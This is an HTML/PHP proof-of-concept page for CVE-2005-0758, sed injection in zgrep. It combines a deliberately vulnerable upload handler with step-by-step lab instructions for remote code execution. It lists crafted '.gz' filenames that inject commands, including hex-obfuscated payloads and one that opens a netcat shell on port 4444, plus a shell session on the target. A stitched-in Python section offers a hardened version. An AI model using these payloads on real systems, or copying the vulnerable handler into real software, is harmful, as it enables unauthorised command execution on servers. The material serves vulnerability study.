Authored by cleemy desu wayo
<!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
a sample of CVE-2005-0758
written by cleemy desu wayo / licensed under CC0
last update: 2023-08-08
============================================================
* try this sample on Knoppix 3.2:
Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed
from the beginning when booting from the Knoppix 3.2 (released
in 2003) Live CD.
you can run this sample on Knoppix 3.2 very easily without
special settings.
* download Knoppix iso:
https://archive.org/details/knoppix-3.2-2003-07-26-en
https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc
* how to run this sample:
1. boot Knoppix Live CD ordinarily
2. put this file (cve-2005-0758.php) on /var/www/ on server.
"server" means Knoppix.
3. change owner and chmod (on server)
$ cd /var/www
$ sudo chown www-data:www-data cve-2005-0758.php
$ sudo chmod 600 cve-2005-0758.php
4. start apache (on server)
$ sudo apachectl start
5. try connect from a client machine to
http://<knoppix>/cve-2005-0758.php
(when Knoppix is running on VirtualBox or some such,
"client machine" means host OS)
-->
<title>a sample of CVE-2005-0758 (sed injection)</title>
<style>
body { margin: 0 0 0 0; font-family: Arial;}
h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
p { margin: 0.8rem 1.2rem 0.8rem 1.8rem; }
form, div.fileinfo, div.description {
margin: 2.2rem 2% 1.2rem 2%;
padding: 0 0 2.2rem 0.6rem;
border: 2px solid #ccc;
border-radius: 8px;
}
ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
ul li { margin: 0.1rem 0 0.1rem 0; }
ol li { margin: 0.8rem 0 0.9rem 0; }
li a { font-size: 0.85rem; }
span.info {
margin-left: 0.8rem;
color: #6666aa;
font-size: 105%;
}
code {
margin: 0.6rem 0 1.2rem 1.2rem;
padding: 0.6rem 0 0.6rem 0.6rem;
display: block;
background-color: #333;
color: #eee;
max-width: 40rem;
line-height: 110%;
}
a { text-decoration: none; }
a:hover { text-decoration: underline; }
footer {
margin: 3rem 0 0 0;
padding: 1.2rem 1rem 1.2rem 1rem;
background-color: #eee;
}
</style>
</head>
<body>
<h1>a sample of CVE-2005-0758</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-08</p>
<div class="fileinfo">
<h2>uploaded file information:</h2>
<?
if(empty($_FILES)) {
print('<p>(no file uploaded)</p>');
} else{
$is_gz_str = 'no';
$original_file_basename = basename($_FILES['file']['name']);
$original_file_pathinfo = pathinfo($original_file_basename);
if($original_file_pathinfo['extension'] === 'gz') {
$is_gz_str = 'yes';
// move to ./gz_stored/
move_uploaded_file($_FILES['file']['tmp_name'], './gz_stored/'. $original_file_basename);
// exec zgrep
exec('zgrep CVE gz_stored/*.gz', $search_results);
// save search results
$fp = fopen('./gz_stat/latest-search-result.txt', 'w');
foreach ($search_results as $line) {
fwrite($fp, $line. "\n");
}
fclose($fp);
}
print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
print('<p>stored to gz_stored/ directory: <span class="info">'. htmlspecialchars($is_gz_str). '</span></p>');
}
?>
</div>
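<p>Added example (not code from the original sample or from the gzip project): a hardened counterpart to the PHP handler above, written in Python so it runs stand-alone. It keeps the same flow (accept a .gz upload, store it, grep the stored files for "CVE") and makes two defensive changes: the client-supplied filename never reaches a shell or the zgrep wrapper, because the upload is stored under a server-generated random name, and the search is done in-process with the gzip module, so no sed script is ever built from a filename. Shell-escaping the argument alone would not be enough here, since the injection happens inside zgrep's own sed script once the file is passed to it. The directory names, function names and the sample gzip content are constructed for this example.</p>

```python
# Added example, not code from the original sample: a hardened counterpart to
# the PHP handler above.  Two defensive changes close the sed-injection path:
#   1. the client-supplied filename never reaches a shell or the zgrep wrapper;
#      uploads are stored under a server-generated random name and the original
#      name is kept only as data (for display, HTML-escaped);
#   2. the search runs in-process with Python's gzip module, so no sed script
#      is ever built from a filename.
# Directory names, function names and the sample .gz content are constructed
# for this example.
import gzip
import os
import re
import secrets
import tempfile
from pathlib import Path

# Allowlist for names we are willing to accept at all; anything else is
# rejected before the upload is stored.  The crafted names on this page
# ('|', ';', '#') all fail this check.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.gz$")


def is_acceptable_upload_name(name: str) -> bool:
    """True only for a bare *.gz basename made of allowlisted characters."""
    return os.path.basename(name) == name and SAFE_NAME_RE.fullmatch(name) is not None


def store_upload(data: bytes, store_dir: Path) -> Path:
    """Write the upload under a random server-chosen name, never the client's."""
    store_dir.mkdir(parents=True, exist_ok=True)
    stored = store_dir / (secrets.token_hex(16) + ".gz")
    # O_EXCL: fail rather than clobber if the name somehow already exists.
    fd = os.open(stored, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return stored


def grep_gz(needle: str, paths) -> list:
    """In-process stand-in for 'zgrep NEEDLE files...': returns 'path:line'
    for every line containing needle (fixed string, no shell, no sed)."""
    hits = []
    for p in paths:
        with gzip.open(p, "rt", encoding="utf-8", errors="replace") as fh:
            for line in fh:
                if needle in line:
                    text = line.rstrip("\n")
                    hits.append(f"{p}:{text}")
    return hits


def handle_upload(client_name: str, data: bytes, store_dir: Path) -> dict:
    """Same flow as the page's handler (accept .gz, store, grep stored files
    for 'CVE'), with the fixes applied."""
    if not is_acceptable_upload_name(client_name):
        return {"stored": False, "reason": "rejected filename", "results": []}
    stored = store_upload(data, store_dir)
    results = grep_gz("CVE", sorted(store_dir.glob("*.gz")))
    return {"stored": True, "path": stored, "results": results}


def run_demo() -> dict:
    """Drive the handler with a benign upload and with the page's crafted
    name; both use constructed sample content.  Returns both outcomes."""
    store_dir = Path(tempfile.mkdtemp(prefix="gz_stored_"))
    sample = gzip.compress(b"CVE-2005-0758\n")  # constructed, like hoge.txt.gz
    benign = handle_upload("hoge.txt.gz", sample, store_dir)
    crafted = handle_upload("|;edate;#.gz", sample, store_dir)
    return {"benign": benign, "crafted": crafted}


if __name__ == "__main__":
    outcome = run_demo()
    print(outcome["benign"]["results"])  # one 'path:CVE-2005-0758' line
    print(outcome["crafted"]["reason"])  # rejected filename
```

<p>The allowlist is the first line of defence, but the rename is the one that matters: even a name that passes the regex is never used on disk, so a future change to the stored-file layout cannot reintroduce a path where user input is handed to a wrapper script. If zgrep itself must be used, the same principle applies: only ever pass it names the server generated.</p>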
<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>
<div class="description">
<h2>about CVE-2005-0758</h2>
<p>this is an ancient vulnerability of zgrep. in the case of GNU gzip, zgrep is a shell wrapper script around grep; the vulnerable versions build a sed script that has the filename embedded in it, which is why a crafted filename can inject sed commands.</p>
<ul>
<li>NVD: <a href="https://nvd.nist.gov/vuln/detail/CVE-2005-0758">https://nvd.nist.gov/vuln/detail/CVE-2005-0758</a></li>
<li>gentoo bug tracker: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
<li>before fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2</a></li>
<li>after fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b</a></li>
</ul>
<h2>about sed injection</h2>
<ul>
<li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
<li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
<li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
</ul>
<h2>try this sample on Knoppix 3.2</h2>
<p>Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from the Knoppix 3.2 (released in 2003) Live CD.</p>
<p>you can run this sample on Knoppix 3.2 very easily without special settings.</p>
<h3>download Knoppix iso</h3>
<ul>
<li><a href="https://archive.org/details/knoppix-3.2-2003-07-26-en">https://archive.org/details/knoppix-3.2-2003-07-26-en</a></li>
<li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc</a></li>
</ul>
<h3>try RCE</h3>
<ol>
<li>boot Knoppix Live CD ordinarily</li>
<li>put this file (cve-2005-0758.php) on /var/www/ on server. "server" means Knoppix.</li>
<li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data cve-2005-0758.php<br>$ sudo chmod 600 cve-2005-0758.php</code></li>
<li>start apache (on server)<code>$ sudo apachectl start</code></li>
<li>try connect from a client machine to http://&lt;knoppix&gt;/cve-2005-0758.php<br>(when Knoppix is running on VirtualBox or some such, "client machine" means host OS)</li>
<li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir gz_stat<br>$ sudo mkdir gz_stored</code></li>
<li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data gz_stat gz_stored<br>$ sudo chmod 707 gz_stat gz_stored<br></code></li>
<li>create an ordinary gz file (on client)<code>$ echo CVE-2005-0758 > hoge.txt<br>$ gzip hoge.txt<br>$ wc -c hoge.txt.gz<br>43 hoge.txt.gz</code></li>
<li>access from the client machine to http://&lt;knoppix&gt;/cve-2005-0758.php<br>and upload hoge.txt.gz</li>
<li>check if you have successfully uploaded (on server)<pre><code>$ cd /var/www/gz_stored<br>$ sudo wc -c hoge.txt.gz<br> 43 hoge.txt.gz<br>$ cat ../gz_stat/latest-search-result.txt<br>CVE-2005-0758</code></pre></li>
<li>create a new gz file with a crafted filename (on client)<code>$ cp hoge.txt.gz '|;edate;#.gz'</code></li>
<li>access http://&lt;knoppix&gt;/cve-2005-0758.php again and upload the new file</li>
<li>check if date command was executed and the search results are weird (on server)<code>$ cd /var/www/gz_stat<br>$ cat latest-search-result.txt<br>gz_stored/hoge.txt.gz:CVE-2005-0758<br>Tue Aug 8 14:54:20 CEST 2023<br>gz_stored/CVE-2005-0758</code></li>
<li>delete a file with a crafted filename (on server)<br>(not necessary to do, but may be confusing if there are multiple files with crafted filenames on server)<br>and do NOT delete hoge.txt.gz<code>$ cd /var/www/gz_stored<br>$ sudo rm -rf *'#.gz'</code></li>
</ol>
<h2>crafted filenames examples</h2>
<h3>several commands</h3>
<ul>
<li>you can exec several commands (this only taints the search results):<code>|;edate;whoami;id;#.gz</code></li>
</ul>
<h3>exec xgalaga on server-side</h3>
<ul>
<li>this may not work:<code>|;exgalaga;#.gz</code></li>
<li>this works fine (exec /usr/games/xgalaga):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.gz</code></li>
</ul>
<h3>get a reverse shell</h3>
<ul>
<li>exec 'nc -lnvp 4444 -e /bin/sh':<code>|;eecho 6e63202d6c6e76702034343434202d65202f62696e2f73680a|xxd -r -p|sh;#.gz</code></li>
<li>try connect to a reverse shell with netcat (from a client machine)<code>$ nc 192.168.1.3 4444<br>uname -a<br>Linux Knoppix 2.4.21-xfs #1 SMP Fre Jul 25 00:06:47 CEST 2003 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>
</div>
<footer>
<p>written by cleemy desu wayo (
<a href="https://github.com/cleemy-desu-wayo">GitHub</a> -
<a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> -
<a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> -
<a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-08</p>
<p>last update: 2023-08-08</p>
</footer>
</body>
</html>